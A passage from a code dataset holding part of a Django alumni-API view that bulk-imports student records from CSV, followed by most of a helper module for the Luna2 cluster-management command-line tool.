student_data['contact'][row_index]\n student_info = {\n 'reg_no': reg_no,\n 'birth_date': birth_date,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'degree': degree.lower().replace(' ', ''),\n 'department': department,\n 'reg_year': reg_year,\n 'pass_year': pass_year,\n 'gender': gender[0]\n }\n logging.info(msg=f'Processing {student_info} with {email} and {contact}')\n try:\n student = Student.objects.create(**student_info)\n if email:\n username = slugify(email)\n user_info = {\n 'username': username,\n 'email': email,\n 'name': f'{first_name} {last_name}',\n }\n user = User.objects.create_user(username=username,\n email=email,\n password=generate_random_password())\n user.name = f'{first_name} {last_name}'\n try:\n user.save()\n member_info = {\n 'user': user,\n 'first_name': first_name,\n 'middle_name': middle_name,\n 'last_name': last_name,\n 'gender': gender[0],\n 'student': student,\n 'birth_date': student.birth_date,\n 'phone': contact\n }\n try:\n member = PersonalProfile.objects.create(**member_info)\n except Exception as ex:\n logging.error(msg=f'{member_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{user_info}', extra=ex)\n except Exception as ex:\n logging.error(msg=f'{student_info}', extra=ex)\n\n\nclass StudentViewSet(ModelViewSet):\n queryset = Student.objects.all()\n serializer_class = StudentSerializer\n permission_classes = (IsAuthenticated,)\n\n\nclass BatchUploadStudentsView(GenericAPIView):\n permission_classes = (permissions.IsAuthenticated, permissions.IsAdminUser,)\n\n def put(self, request, *args, **kwargs):\n students_data_file = request.FILES.get('file')\n with students_data_file.file as csv_file:\n process_students_data_file(csv_file)\n return Response(status=204)\n", "repo_name": "harshalgalgale/alumni-api", "sub_path": "students/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4222, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 20, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 24, "usage_type": "attribute"}, {"api_name": "string.punctuation", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 34, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 58, "usage_type": "call"}, {"api_name": "students.models.Student.objects.create", "line_number": 60, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 60, "usage_type": "name"}, {"api_name": "django.utils.text.slugify", "line_number": 62, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects.create", "line_number": 85, "usage_type": "call"}, {"api_name": "members.models.PersonalProfile.objects", "line_number": 85, "usage_type": "attribute"}, {"api_name": "members.models.PersonalProfile", "line_number": 85, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 87, "usage_type": 
"call"}, {"api_name": "logging.error", "line_number": 89, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 91, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 94, "usage_type": "name"}, {"api_name": "students.models.Student.objects.all", "line_number": 95, "usage_type": "call"}, {"api_name": "students.models.Student.objects", "line_number": 95, "usage_type": "attribute"}, {"api_name": "students.models.Student", "line_number": 95, "usage_type": "name"}, {"api_name": "students.serializers.StudentSerializer", "line_number": 96, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.generics.GenericAPIView", "line_number": 100, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 101, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 101, "usage_type": "attribute"}, {"api_name": "rest_framework.response.Response", "line_number": 107, "usage_type": "call"}]} +{"seq_id": "41493983062", "text": "__author__ = \"Sumit Sharma\"\n__copyright__ = \"Copyright 2022, Luna2 Project [CLI]\"\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = \"Sumit Sharma\"\n__email__ = \"sumit.sharma@clustervision.com\"\n__status__ = \"Development\"\n\nimport os\nfrom time import time, sleep\nimport base64\nimport binascii\nimport subprocess\nfrom random import randint\nfrom os import getpid\nfrom multiprocessing import Process\nfrom copy import deepcopy\nimport hostlist\nfrom termcolor import colored\nfrom nested_lookup import nested_lookup, nested_update, nested_delete, nested_alter\nfrom luna.utils.rest import Rest\nfrom luna.utils.log import Log\nfrom luna.utils.presenter import Presenter\nfrom luna.utils.constant import EDITOR_KEYS, BOOL_KEYS, filter_columns, sortby\nfrom luna.utils.message import Message\n\n\nclass Helper():\n \"\"\"\n All kind of helper methods.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor - As of now, nothing have to initialize.\n \"\"\"\n self.logger = Log.get_logger()\n\n\n def choice_to_bool(self, raw_data=None):\n \"\"\"\n This method will convert string choices to\n boolean\n \"\"\"\n for key in BOOL_KEYS:\n content = nested_lookup(key, raw_data)\n if content:\n if content[0] is not None:\n if content[0] == '':\n raw_data = nested_update(raw_data, key=key, value='')\n elif content[0].lower() in ['y', 'yes', 'true']:\n raw_data = nested_update(raw_data, key=key, value=True)\n else:\n raw_data = nested_update(raw_data, key=key, value=False)\n return raw_data\n\n\n def prepare_payload(self, table=None, raw_data=None):\n \"\"\"\n This method will prepare the payload.\n \"\"\"\n raw_data = self.choice_to_bool(raw_data)\n payload = {k: v for k, v in raw_data.items() if v is not None}\n for key in EDITOR_KEYS:\n content = nested_lookup(key, payload)\n if content:\n if content[0] is True:\n if table:\n get_list = Rest().get_data(table, payload['name'])\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n if get_list:\n value = nested_lookup(key, get_list)\n if value:\n content = self.open_editor(key, value[0], payload)\n payload = nested_update(payload, key=key, value=content)\n else:\n content = self.open_editor(key, None, payload)\n payload = 
nested_update(payload, key=key, value=content)\n elif content[0] is False:\n payload = nested_delete(payload, key)\n elif content[0]:\n if os.path.exists(content[0]):\n if os.path.isfile(content[0]):\n with open(content[0], 'rb') as file_data:\n content = self.base64_encode(file_data.read())\n payload = nested_update(payload, key=key, value=content)\n else:\n Message().error_exit(f'ERROR :: {content[0]} is a Invalid filepath.')\n else:\n content = self.base64_encode(bytes(content[0], 'utf-8'))\n payload = nested_update(payload, key=key, value=content)\n return payload\n\n\n def open_editor(self, key=None, value=None, payload=None):\n \"\"\"\n This Method will open a default text editor to\n write the multiline text for keys such as comment,\n prescript, postscript, partscript, content etc. but\n not limited to them only.\n \"\"\"\n response = ''\n editor = str(os.path.abspath(__file__)).replace('helper.py', 'editor.sh')\n os.chmod(editor, 0o0755)\n random_path = str(time())+str(randint(1001,9999))+str(getpid())\n tmp_folder = f'/tmp/lunatmp-{random_path}'\n os.mkdir(tmp_folder)\n if key == 'content':\n filename = f'/tmp/lunatmp-{random_path}/{payload[\"name\"]}{key}'\n else:\n filename = f'/tmp/lunatmp-{random_path}/{key}'\n temp_file = open(filename, \"x\", encoding='utf-8')\n if value:\n value = self.base64_decode(value)\n temp_file.write(value)\n temp_file.close()\n subprocess.check_output(f\"sed -i 's/\\r$//' {editor}\", shell=True)\n subprocess.call([editor, filename])\n with open(filename, 'rb') as file_data:\n response = self.base64_encode(file_data.read())\n os.remove(filename)\n os.rmdir(tmp_folder)\n return response\n\n\n def get_list(self, table=None, args=None):\n \"\"\"\n Method to list all switches from Luna Configuration.\n \"\"\"\n response = False\n fields, rows = [], []\n get_list = Rest().get_data(table)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table]\n if args['raw']:\n json_data = Helper().prepare_json(data)\n # print(json_data)\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data(table, data)\n # fields = list(map(lambda x: x.replace('tpm_uuid', 'tpm_present'), fields))\n # fields = list(map(lambda x: x.replace('ns_ip', 'nameserver'), fields))\n self.logger.debug(f'Fields => {fields}')\n self.logger.debug(f'Rows => {rows}')\n title = f' << {table.capitalize()} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} is not found.')\n return response\n\n\n def show_data(self, table=None, args=None):\n \"\"\"\n Method to show a switch in Luna Configuration.\n \"\"\"\n row_name = None\n if 'name' in args:\n row_name = args['name']\n get_list = Rest().get_data(table, row_name)\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n if row_name:\n data = get_list['config'][table][row_name]\n else:\n data = get_list['config'][table]\n json_data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(json_data)\n else:\n data = Helper().prepare_json(data, True)\n fields, rows = self.filter_data_col(table, data)\n self.logger.debug(f'Fields => {fields}')\n 
self.logger.debug(f'Rows => {rows}')\n title = f'{table.capitalize()} => {data[\"name\"]}'\n response = Presenter().show_table_col(title, fields, rows)\n else:\n response = Message().show_error(f'{args[\"name\"]} is not found in {table}.')\n return response\n\n\n def member_record(self, table=None, args=None):\n \"\"\"\n This method fetch the nodes to the provided entity.\n \"\"\"\n response = False\n get_list = Rest().get_data(table, args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config'][table][args[\"name\"]]['members']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'Nodes']\n rows = []\n for member in data:\n new_row = [num, member]\n rows.append(new_row)\n num = num + 1\n title = f'<< {table.capitalize()} {args[\"name\"]} Member Nodes >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'{table} {args[\"name\"]} not have any node.')\n return response\n\n\n def reserved_ip(self, args=None):\n \"\"\"\n This method will fetch all the reserved IP Address for a network.\n \"\"\"\n response = False\n get_list = Rest().get_data('network', args['name']+'/_member')\n if get_list.status_code == 200:\n get_list = get_list.content\n else:\n Message().error_exit(get_list.content, get_list.status_code)\n self.logger.debug(f'Get List Data from Helper => {get_list}')\n if get_list:\n data = get_list['config']['network'][args[\"name\"]]['taken']\n data = Helper().prepare_json(data)\n if args['raw']:\n response = Presenter().show_json(data)\n else:\n num = 1\n fields = ['#', 'IP Address', 'Device Name']\n rows = []\n for each in data:\n new_row = [num, each['ipaddress'], each['device']]\n rows.append(new_row)\n num = num + 1\n title = f'<< Reserved IP Addresses for Network {args[\"name\"]} >>'\n response = Presenter().show_table(title, fields, rows)\n else:\n response = Message().show_error(f'Network {args[\"name\"]} not have any IP reserved.')\n return response\n\n\n def add_record(self, table=None, data=None):\n \"\"\"\n This method will add a new record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(None, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n message = f'{payload[\"name\"]} already present in {table.capitalize()}'\n Message().error_exit(message, record.status_code)\n else:\n response = Rest().post_data(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def update_record(self, table=None, data=None):\n \"\"\"\n This method will update a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n if 'raw' in data:\n data.pop('raw', None)\n payload = self.prepare_payload(table, data)\n name = None\n if 'name' in payload:\n name = payload['name']\n request_data = {'config':{table:{name: payload}}}\n else:\n request_data = {'config':{table: payload}}\n if 'cluster' in table:\n request_data = 
{'config':{table: payload}}\n self.logger.debug(f'Payload => {request_data}')\n if 'cluster' in table:\n response = Rest().post_data(table, None, request_data)\n else:\n record = Rest().get_data(table, payload['name'])\n if record.status_code == 200:\n if len(payload) == 1:\n Message().error_exit('Kindly choose something to update.')\n else:\n response = Rest().post_data(table, name, request_data)\n else:\n Message().error_exit(f'Kindly add the {payload[\"name\"]} first', record.status_code)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n if name:\n Message().show_success(f'{table.capitalize()} {name} is updated.')\n else:\n Message().show_success(f'{table.capitalize()} is updated.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def delete_record(self, table=None, data=None):\n \"\"\"\n This method will delete a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n self.logger.debug(f'Payload => {data}')\n response = Rest().get_delete(table, data['name'])\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is removed.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def rename_record(self, table=None, data=None, newname=None):\n \"\"\"\n This method will rename a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_data(table, data['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 204:\n Message().show_success(f'{table.capitalize()} {data[\"name\"]} is renamed to {newname}.')\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def clone_record(self, table=None, data=None):\n \"\"\"\n This method will clone a record.\n \"\"\"\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n payload = self.prepare_payload(table, data)\n request_data = {'config':{table:{payload['name']: payload}}}\n self.logger.debug(f'Payload => {request_data}')\n response = Rest().post_clone(table, payload['name'], request_data)\n self.logger.debug(f'Response => {response}')\n if response.status_code == 201:\n Message().show_success(response.content)\n else:\n Message().error_exit(response.content, response.status_code)\n return True\n\n\n def grab_osimage(self, table=None, data=None):\n \"\"\"\n Method to grab an osimage for a node.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Grabbing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_osgrab'\n data = self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_grabbing_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if 
http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_grabbing_status(uri)\n else:\n return False\n response = dig_grabbing_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Grabbed for node {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def push_osimage(self, table=None, data=None):\n \"\"\"\n Method to push an osimage for a node or a group.\n \"\"\"\n process1 = Process(target=Helper().loader, args=(\"OS Image Pushing...\",))\n process1.start()\n response = False\n for remove in ['verbose', 'command', 'action']:\n data.pop(remove, None)\n uri = f'config/{table}/{data[\"name\"]}/_ospush'\n data = self.prepare_payload(table, data)\n request_data = {'config':{table:{data['name']: data}}}\n self.logger.debug(f'Payload => {data}')\n http_response = Rest().post_raw(uri, request_data)\n result = http_response\n if http_response.status_code == 200:\n http_response = http_response.json()\n if 'request_id' in http_response.keys():\n uri = f'config/status/{http_response[\"request_id\"]}'\n def dig_push_status(uri):\n result = Rest().get_raw(uri)\n if result.status_code == 404:\n process1.terminate()\n return True\n elif result.status_code == 200:\n http_response = result.json()\n if http_response['message']:\n message = http_response['message'].split(';;')\n for msg in message:\n sleep(2)\n Message().show_success(f'{msg}')\n sleep(2)\n return dig_push_status(uri)\n else:\n return False\n response = dig_push_status(uri)\n if response:\n Message().show_success(f'[========] OS Image Pushed for {table} {data[\"name\"]}.')\n else:\n Message().error_exit(result.content, result.status_code)\n return True\n\n\n def get_hostlist(self, raw_hosts=None):\n \"\"\"\n This method will perform power option on node.\n \"\"\"\n response = []\n self.logger.debug(f'Received hostlist: {raw_hosts}.')\n try:\n response = hostlist.expand_hostlist(raw_hosts)\n self.logger.debug(f'Expanded hostlist: {response}.')\n except hostlist.BadHostlist:\n self.logger.debug(f'Hostlist is incorrect: {raw_hosts}.')\n return response\n\n\n def common_list_args(self, parser=None):\n \"\"\"\n This method will provide the common list and show arguments..\n \"\"\"\n parser.add_argument('-v', '--verbose', action='store_true', help='Verbose Mode')\n parser.add_argument('-R', '--raw', action='store_true', help='Raw JSON output')\n return parser\n\n\n def loader(self, message=None):\n \"\"\"\n This method is a loader, will run while transactions happens.\n \"\"\"\n animation = [\n f\"[= ] {message}\",\n f\"[=== ] {message}\",\n f\"[==== ] {message}\",\n f\"[===== ] {message}\",\n f\"[====== ] {message}\",\n f\"[======= ] {message}\",\n f\"[========] {message}\",\n f\"[ =======] {message}\",\n f\"[ ======] {message}\",\n f\"[ =====] {message}\",\n f\"[ ====] {message}\",\n f\"[ ===] {message}\",\n f\"[ ==] {message}\",\n f\"[ =] {message}\",\n f\"[ ] {message}\",\n f\"[ ] {message}\", ]\n not_complete = True\n i = 0\n try:\n while not_complete:\n print(animation[i % len(animation)], end='\\r')\n sleep(.1)\n i += 1\n except KeyboardInterrupt:\n return False\n return True\n\n\n def control_print(self, system=None, content=None, count=None):\n \"\"\"\n This method will parse the data for Control API's.\n \"\"\"\n result = {}\n possible_cases = ['ok', 'on', 'off']\n if 'failed' in content['control']:\n for key, value in 
content['control']['failed'].items():\n result[key] = value\n\n if system in content['control']:\n for case in possible_cases:\n if case in content['control'][system]:\n for key, value in content['control'][system][case].items():\n result[key] = case.upper()\n result = dict(sorted(result.items()))\n\n header = \"| # | Node Name | \"\n header += \"Status |\"\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n rows = []\n for key, value in result.items():\n rows.append([count, key, value])\n count = count + 1\n\n if rows:\n for row in rows:\n if row[0] == 1:\n Message().show_success(hr_line)\n Message().show_success(header)\n Message().show_success(hr_line)\n row[0] = f'{row[0]}'.ljust(6)\n row[1] = f'{row[1]}'.ljust(19)\n row[2] = f'{row[2]}'.ljust(58)\n line = f'| {row[0]}| {row[1]}| {row[2]}|'\n Message().show_success(line)\n return count\n\n\n def dig_control_status(self, request_id=None, count=None, system=None):\n \"\"\"\n This method will fetch the status of Control API.\n \"\"\"\n uri = f'control/status/{request_id}'\n sleep(2)\n status = Rest().get_raw(uri)\n status_json = status.json()\n if status.status_code == 200:\n count = Helper().control_print(system, status_json, count)\n return self.dig_control_status(request_id, count, system)\n elif status.status_code == 404:\n hr_line = 'X--------------------------------------------'\n hr_line += '--------------------------------------------X'\n Message().show_success(hr_line)\n else:\n Message().show_error(f\"Something Went Wrong {status.status_code}\")\n\n\n def filter_interface(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format from the interface\n \"\"\"\n self.logger.debug(f'table => {table}')\n self.logger.debug(f'data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n if field_key in list(ele.keys()):\n if ele[field_key] == 'in progress':\n val_row.append(colored('in progress', 'green'))\n elif ele[field_key] == 'queued':\n val_row.append(colored('queued', 'yellow'))\n elif ele[field_key] == 1:\n val_row.append(colored('yes', 'green'))\n elif ele[field_key] == 0:\n val_row.append(colored('no', 'yellow'))\n elif ele[field_key] == 'maintask':\n val_row.append(colored('Main Task', 'blue'))\n elif ele[field_key] == 'subtask':\n val_row.append(colored('Sub Task', 'magenta'))\n else:\n val_row.append(ele[field_key])\n else:\n val_row.append(\"--NA--\")\n self.logger.debug(f'Element => {ele}')\n rows.append(val_row)\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n self.logger.debug(f'Rows before Swapping => {rows}')\n final_rows = []\n for array in range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_data(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table}')\n self.logger.debug(f'Data => {data}')\n fields, rows, colored_fields = [], [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for field_key in fields:\n val_row = []\n for ele in data:\n 
if field_key in list((data[ele].keys())):\n if isinstance(data[ele][field_key], list):\n new_list = []\n for internal in data[ele][field_key]:\n for internal_val in internal:\n self.logger.debug(f'Key => {internal_val}')\n self.logger.debug(f'Value => {internal[internal_val]}')\n in_key = internal_val\n in_val = internal[internal_val]\n new_list.append(f'{in_key} = {in_val} ')\n new_list = '\\n'.join(new_list)\n val_row.append(new_list)\n new_list = []\n elif field_key == 'tpm_uuid':\n if data[ele][field_key]:\n val_row.append(True)\n else:\n val_row.append(False)\n else:\n val_row.append(data[ele][field_key])\n else:\n val_row.append(\"--NA--\")\n rows.append(val_row)\n self.logger.debug(f'Each Row => {val_row}')\n val_row = []\n colored_fields.append(field_key)\n fields = colored_fields\n final_rows = []\n for array in range(len(rows[0])) :\n tmp = []\n for element in rows:\n tmp.append(element[array])\n final_rows.append(tmp)\n rows = final_rows\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def base64_encode(self, content=None):\n \"\"\"\n This method will encode a base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = base64.b64encode(content).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Encode Error => {content}')\n return content\n\n\n def base64_decode(self, content=None):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n try:\n if content is not None:\n content = content.replace(\"\\r\", \"\\\\r\")\n content = base64.b64decode(content, validate=True).decode(\"utf-8\")\n except binascii.Error:\n self.logger.debug(f'Base64 Decode Error => {content}')\n except UnicodeDecodeError:\n self.logger.debug(f'Base64 Unicode Decode Error => {content}')\n return content\n\n\n def update_dict(self, data=None):\n \"\"\"\n Deep Update the Dict\n \"\"\"\n for key, value in data.items():\n if isinstance(value, str):\n value = None if value == 'None' else value\n if value is not None:\n data[key] = self.base64_decode(value)\n return self.update_dict(data)\n else:\n return self.update_dict(data)\n return data\n\n\n def callback(self, value=None):\n \"\"\"\n This method is a call back method for the nested lookup.\n \"\"\"\n if isinstance(value, str):\n if value.lower() == 'none':\n value = None\n elif value.lower() == 'true':\n value = True\n elif value.lower() == 'false':\n value = False\n elif value.lower() == 'null':\n value = None\n response = value\n if value not in [None, True, False] and isinstance(value, str):\n response = self.base64_decode(value)\n return response\n\n\n def nested_dict(self, dictionary=None, limit=False):\n \"\"\"\n This method will check the nested dictionary.\n \"\"\"\n for key, value in dictionary.items():\n if isinstance(value, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n dictionary[key] = self.less_content(doc[key], limit)\n else:\n dictionary[key] = value\n elif isinstance(value, dict):\n return self.nested_dict(dictionary, limit)\n elif isinstance(value, list):\n return self.nested_list(dictionary, key, value, limit)\n return dictionary\n\n\n def nested_list(self, dictionary=None, key=None, value=None, limit=False):\n \"\"\"\n This method will check the list for a dictionary.\n \"\"\"\n response = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n if key in EDITOR_KEYS:\n doc = 
nested_alter({key : occurrence}, key, self.callback)\n response.append(self.less_content(doc[key], limit))\n else:\n response.append(occurrence)\n elif isinstance(occurrence, dict):\n response.append(self.nested_dict(occurrence, limit))\n dictionary[key] = response\n return dictionary\n\n\n def less_content(self, content=None, limit=False):\n \"\"\"\n This method will reduce the length of the content.\n \"\"\"\n if limit:\n if content not in [None, True, False] and isinstance(content, str):\n if len(content) > 60:\n content = content[:60]+' ...'\n return content\n\n\n def prepare_json(self, json_data=None, limit=False):\n \"\"\"\n This method will decode the base 64 string.\n \"\"\"\n self.logger.debug(f'Data Limit => {limit}')\n if isinstance(json_data, dict):\n for key, value in json_data.items():\n if isinstance(value, str):\n if key in EDITOR_KEYS:\n doc = nested_alter({key : value}, key, self.callback)\n json_data[key] = self.less_content(doc[key], limit)\n else:\n json_data[key] = value\n elif isinstance(value, dict):\n json_data[key] = self.nested_dict(value, limit)\n elif isinstance(value, list):\n final_list = []\n if value:\n for occurrence in value:\n if isinstance(occurrence, str):\n doc = nested_alter({key : occurrence}, key, self.callback)\n final_list.append(self.less_content(doc[key], limit))\n elif isinstance(occurrence, dict):\n final_list.append(self.nested_dict(occurrence, limit))\n json_data[key] = final_list\n return json_data\n\n\n def get_secrets(self, table=None, data=None):\n \"\"\"\n This method will filter data for Secrets\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = filter_columns(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n return fields, rows\n\n\n def filter_secret_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for\n row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n rows, colored_fields = [], []\n fields = sortby(table)\n self.logger.debug(f'Fields => {fields}')\n for key in data:\n new_row = []\n for value in data[key]:\n self.logger.debug(f'Key => {key} and Value => {value}')\n new_row.append(key)\n new_row.append(value['name'])\n new_row.append(value['path'])\n content = self.base64_decode(value['content'])\n if content is not None:\n new_row.append(content[:60]+'...')\n else:\n new_row.append(content)\n # new_row.append(content)\n rows.append(new_row)\n new_row = []\n for newfield in fields:\n colored_fields.append(newfield)\n fields = colored_fields\n # Adding Serial Numbers to the dataset\n fields.insert(0, '#')\n num = 1\n for outer in rows:\n outer.insert(0, num)\n num = num + 1\n # Adding Serial Numbers to the dataset\n new_fields, new_row = [], []\n for row in rows:\n new_fields = new_fields + fields\n new_row = new_row + row\n new_fields.append(\"\")\n 
new_row.append(\"\")\n return new_fields, new_row\n\n\n def filter_data_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n data = self.merge_source(table, data)\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n self.logger.debug(f'Sorted Data => {data}')\n fields, rows = [], []\n for key in data:\n fields.append(key[0])\n if isinstance(key[1], list):\n new_list = []\n for internal in key[1]:\n for internal_val in internal:\n self.logger.debug(f'Key: {internal_val} Value: {internal[internal_val]}')\n if internal_val == \"interface\":\n new_list.append(f'{internal_val} = {internal[internal_val]}')\n else:\n new_list.append(f' {internal_val} = {internal[internal_val]}')\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n elif isinstance(key[1], dict):\n new_list = []\n num = 1\n for internal in key[1]:\n self.logger.debug(f'Key => {internal} and Value => {key[1][internal]}')\n in_key = internal\n in_val = key[1][internal]\n new_list.append(f'{in_key} = {in_val} ')\n num = num + 1\n new_list = '\\n'.join(new_list)\n rows.append(new_list)\n new_list = []\n else:\n rows.append(key[1])\n return fields, rows\n\n\n def merge_source(self, table=None, data=None):\n \"\"\"\n This method will merge *_source field to the real field with braces and remove the\n *_source keys from the output.\n \"\"\"\n response = deepcopy(data)\n for key, value in data.items():\n script = True if 'part' in key or 'post' in key or 'pre' in key else False\n if '_source' in key:\n raw_name = key.replace('_source', '')\n if isinstance(data[raw_name], str):\n default_value = data[raw_name].rstrip()\n if len(default_value) == 0:\n default_value = ''\n else:\n default_value = data[raw_name]\n if value in data:\n if script is True and default_value != '':\n response[raw_name] = f'({data[value]}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({data[value]})'\n else:\n if str(value) == str(table):\n response[raw_name] = f'{default_value}'\n else:\n if script is True and default_value != '':\n response[raw_name] = f'({value}) {default_value}'\n else:\n response[raw_name] = f'{default_value} ({value})'\n del response[key]\n return response\n\n\n def filter_osimage_col(self, table=None, data=None):\n \"\"\"\n This method will generate the data as for row format\n \"\"\"\n self.logger.debug(f'Table => {table} and Data => {data}')\n defined_keys = sortby(table)\n self.logger.debug(f'Fields => {defined_keys}')\n for new_key in list(data.keys()):\n if new_key not in defined_keys:\n defined_keys.append(new_key)\n index_map = {v: i for i, v in enumerate(defined_keys)}\n data = sorted(data.items(), key=lambda pair: index_map[pair[0]])\n 